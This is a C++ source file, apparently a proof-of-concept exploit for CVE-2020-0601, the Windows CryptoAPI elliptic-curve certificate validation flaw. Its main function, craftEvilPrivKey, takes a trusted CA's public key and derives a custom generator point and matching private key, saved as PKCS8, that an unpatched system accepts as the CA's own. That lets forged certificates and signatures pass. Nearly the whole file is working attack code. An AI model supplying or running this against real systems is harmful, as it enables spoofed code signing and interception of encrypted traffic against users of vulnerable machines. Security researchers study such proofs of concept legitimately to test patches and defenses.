#include "cve-2020-0601_poc.h"

#include <cryptopp/sha.h>
#include <cryptopp/eccrypto.h>
#include <cryptopp/nbtheory.h>
#include <cryptopp/osrng.h>
#include <cryptopp/oids.h>
#include <cryptopp/files.h>
using CryptoPP::SHA1;
using CryptoPP::SHA256;
using CryptoPP::SHA384;
using CryptoPP::ECDSA;
using CryptoPP::ECP;
using CryptoPP::DL_Keys_ECDSA;
using CryptoPP::StringSource;
using CryptoPP::DL_GroupParameters_EC;
using CryptoPP::DL_PrivateKey_EC;
using CryptoPP::DERSequenceEncoder;
using CryptoPP::DEREncodeUnsigned;
using CryptoPP::DERGeneralEncoder;
using CryptoPP::BufferedTransformation;

//#define SUPPORT_DER_ENCODING 1

#ifdef SUPPORT_DER_ENCODING
// stolen from https://github.com/noloader/cryptopp-pem/blob/master/pem_write.cpp

// This class saves the existing EncodeAsOID setting for EC group parameters.
// PEM_Save unconditionally sets it to TRUE for OpenSSL compatibility. See
// https://wiki.openssl.org/index.php/Elliptic_Curve_Cryptography#Named_Curves
template <class T>
struct OID_State
{
    OID_State(const T& obj);
    virtual ~OID_State();

    const T& m_gp;
    bool m_flag;
};

template <>
OID_State<DL_GroupParameters_EC<ECP> >::OID_State(const DL_GroupParameters_EC<ECP>& gp)
: m_gp(gp), m_flag(gp.GetEncodeAsOID()) {
    DL_GroupParameters_EC<ECP>& obj = const_cast<DL_GroupParameters_EC<ECP>&>(m_gp);
    obj.SetEncodeAsOID(true);
}

template <>
OID_State<DL_GroupParameters_EC<ECP> >::~OID_State() {
    DL_GroupParameters_EC<ECP>& obj = const_cast<DL_GroupParameters_EC<ECP>&>(m_gp);
    obj.SetEncodeAsOID(m_flag);
}

template <class EC>
void savePrivKey(const DL_PrivateKey_EC<EC>& key, BufferedTransformation& bt)
{

    // Crypto++ provides {version,x}, while OpenSSL expects {version,x,curve oid,y}.
    typedef typename DL_PrivateKey_EC<EC>::Element Element;
    const DL_GroupParameters_EC<EC>& params = key.GetGroupParameters();
    const CryptoPP::Integer& x = key.GetPrivateExponent();
    const Element& y = params.ExponentiateBase(x);

    CryptoPP::Integer M = params.GetCurve().GetField().GetModulus();
    CryptoPP::Integer A = params.GetCurve().GetA();
    CryptoPP::Integer B = params.GetCurve().GetB();
    const Element G = params.GetSubgroupGenerator();

    // Named curve
    CryptoPP::OID oid;
    bool validNamedCurve = key.GetVoidValue(CryptoPP::Name::GroupOID(), typeid(oid), &oid);
    //if (key.GetVoidValue(CryptoPP::Name::GroupOID(), typeid(oid), &oid) == false)
    //    throw CryptoPP::Exception(CryptoPP::Exception::OTHER_ERROR, "PEM_DEREncode: failed to retrieve curve OID");
    // as we might have private key with custom curve, it can not be found among the list of approved OIDs
    // thus, the call commented above will raise an exception.
    // we can handle this case by just providing a fake OID. this will make the resulting key unparsable
    // by most of the tools, but in fact it will work
    // if we insert here known OID here, tools will try to validate the key and this validation will fail
    if (!validNamedCurve) {
        oid += 1; oid += 2; oid += 3; oid += 4; oid += 5;
        //oid = CryptoPP::ASN1::secp384r1();
    }

    DERSequenceEncoder seq1(bt);
        DEREncodeUnsigned<CryptoPP::word32>(seq1, 1);  // version
        x.DEREncodeAsOctetString(seq1, params.GetSubgroupOrder().ByteCount());

        DERGeneralEncoder cs1(seq1, CryptoPP::CONTEXT_SPECIFIC | CryptoPP::CONSTRUCTED | 0);
            //params.DEREncode(cs1);
            DERSequenceEncoder seq2(cs1);
                DEREncodeUnsigned<CryptoPP::word32>(seq2, 1);
                params.GetCurve().DEREncode(seq2);
                params.GetCurve().DEREncodePoint(seq2, params.GetSubgroupGenerator(), false);
                params.GetGroupOrder().DEREncode(seq2);
                DEREncodeUnsigned<CryptoPP::word32>(seq2, 1);
            seq2.MessageEnd();
        cs1.MessageEnd();
    seq1.MessageEnd();
    bt.MessageEnd();
}

void privKeyToDer(const DL_PrivateKey_EC<ECP>& ec, BufferedTransformation& bt)
{
    OID_State<DL_GroupParameters_EC<ECP> > state(ec.GetGroupParameters());
    savePrivKey(ec, bt);
}

void privKeyToDer(const DL_Keys_ECDSA<ECP>::PrivateKey& ecdsa, BufferedTransformation& bt)
{
    privKeyToDer(dynamic_cast<const DL_PrivateKey_EC<ECP>&>(ecdsa), bt);
}
#endif

bool craftEvilPrivKey(const char *caPubKeyRaw, size_t caPubKeyRawLen,
                      char *outEvilPrivKeyPKCS8, size_t maxSizePKCS8, size_t *outEvilPrivKeyPKCS8Len,
                      bool doSave, const char *evilPrivKeyFileName)
{
    // load public key of the provided certificate into native CryptoPP type
    DL_Keys_ECDSA<ECP>::PublicKey caPubKey;
    caPubKey.Load(CryptoPP::ArraySource((const unsigned char *)caPubKeyRaw,
                                         caPubKeyRawLen, true).Ref());

    // generate a private key using the same curve as in the provided CA certificate
    CryptoPP::AutoSeededRandomPool prng;
    DL_Keys_ECDSA<ECP>::PrivateKey privKeyBase;
    privKeyBase.Initialize(prng, caPubKey.GetGroupParameters());

    // get the private key elliptic curve parameters
    CryptoPP::Integer privKeyBaseExp = privKeyBase.GetPrivateExponent();
    ECP privKeyBaseCurve = privKeyBase.GetGroupParameters().GetCurve();
    CryptoPP::Integer privKeyBaseOrder = privKeyBase.GetGroupParameters().GetSubgroupOrder();

    // calculate an inverse value of the private key
    CryptoPP::Integer privKeyInverse = CryptoPP::EuclideanMultiplicativeInverse(privKeyBaseExp, privKeyBaseOrder);
    // produce our custom generator (base point) as a multiplication of the inverse value of our private key
    // and the public key of the provided CA certificate
    ECP::Point caPubKeyQ = caPubKey.GetPublicElement();
    ECP::Point evilG = privKeyBaseCurve.ScalarMultiply(caPubKeyQ, privKeyInverse);

    // create an "evil" private key object using the base private's key exponent and curve but
    // with our "evil" generator (base point)
    DL_Keys_ECDSA<ECP>::PrivateKey evilPrivKey;
    evilPrivKey.Initialize(privKeyBaseCurve, evilG, privKeyBaseOrder, privKeyBaseExp);

    // convert evil private key into PKCS8 format
    CryptoPP::ArraySink evilPrivKeyPKCS8As((unsigned char *)outEvilPrivKeyPKCS8, maxSizePKCS8);
    evilPrivKey.Save(evilPrivKeyPKCS8As.Ref());
    *outEvilPrivKeyPKCS8Len = evilPrivKeyPKCS8As.TotalPutLength();

    if (doSave) {
        // save it as-is so this can be imported by some tools
        evilPrivKey.Save(CryptoPP::FileSink(evilPrivKeyFileName).Ref());
    }

    // the code below converts the key to DER format
    // however, as we have here our custom curve (not the "named" one), most of the
    // tools are not able to properly import it. thus, leaving this code commented-out
#ifdef SUPPORT_DER_ENCODING
    CryptoPP::ArraySink evilPrivKeyDerAs((CryptoPP::byte *)outEvilPrivKeyDer, maxSizeDer);
    privKeyToDer(evilPrivKey, evilPrivKeyDerAs.Ref());
    *outEvilPrivKeyDerLen = evilPrivKeyDerAs.TotalPutLength();
#endif

    return true;
}
